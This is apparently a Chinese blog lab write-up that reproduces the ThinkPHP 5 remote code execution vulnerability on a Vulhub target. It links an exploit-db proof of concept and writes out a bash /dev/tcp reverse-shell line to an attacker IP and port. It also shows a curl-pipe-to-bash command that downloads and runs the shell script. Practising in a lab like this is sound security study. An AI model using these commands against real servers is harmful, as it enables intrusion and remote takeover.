郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
影响版本:5.0.22、5.1.29
测试机IP:192.168.79.129
靶机IP:192.168.79.131
1. 启动Vulnhub靶机环境:
2. 验证靶机应用启用成功:
POC 引用:https://www.exploit-db.com/exploits/46150
准备反弹Shell文件shell.sh
bash -i >& /dev/tcp/192.168.79.129/4444 0>&1
启http server
使用NC侦听反弹端口
执行命令
curl 192.168.79.129/shell.sh | bash
得到反弹Shell
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。 漏洞简述 ThinkPHP是一款运用...
ThinkPHP框架存在“URI取值任意代,码执行”漏洞(详情),黑客可借此在网站上执行任意PHP代码,甚至获取服...
Vim 和 NeoVim曝出了一个允许任意代码执行的高危漏洞。漏洞编号CVE-2019-12735,Vim 8.1...
漏洞描述 开启WebDAV服务的IIS6.0存在缓冲区溢出漏洞可以任意代码执行,目前针对 Windows Serv...
0x00 漏洞介绍 node.js 存在反序列化远程代码任意执行漏洞,若不可信数据传入 unserialize()...
1 概述 文 件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会...
伪协议文件读取+preg_replace()任意代码执行首先php伪协议读取index.php代码 漏洞点在下面测...
Discuz! 6.x/7.x 版本 前台任意代码执行漏洞 转自:https://paper.tuisec.win...
ECShop 2.x/3.x SQL注入/任意代码执行漏洞 1.漏洞影响版本 ECShop 2.x/3.x 2.漏...
一、PHP代码执行代码审计首先讲一下PHP代码执行漏洞和命令执行漏洞的区别,PHP代码执行指的是将php代码植入到...
本文标题:Vulnhub-ThinkPHP5 任意代码执行漏洞
本文链接:https://www.haomeiwen.com/subject/kujcuktx.html
网友评论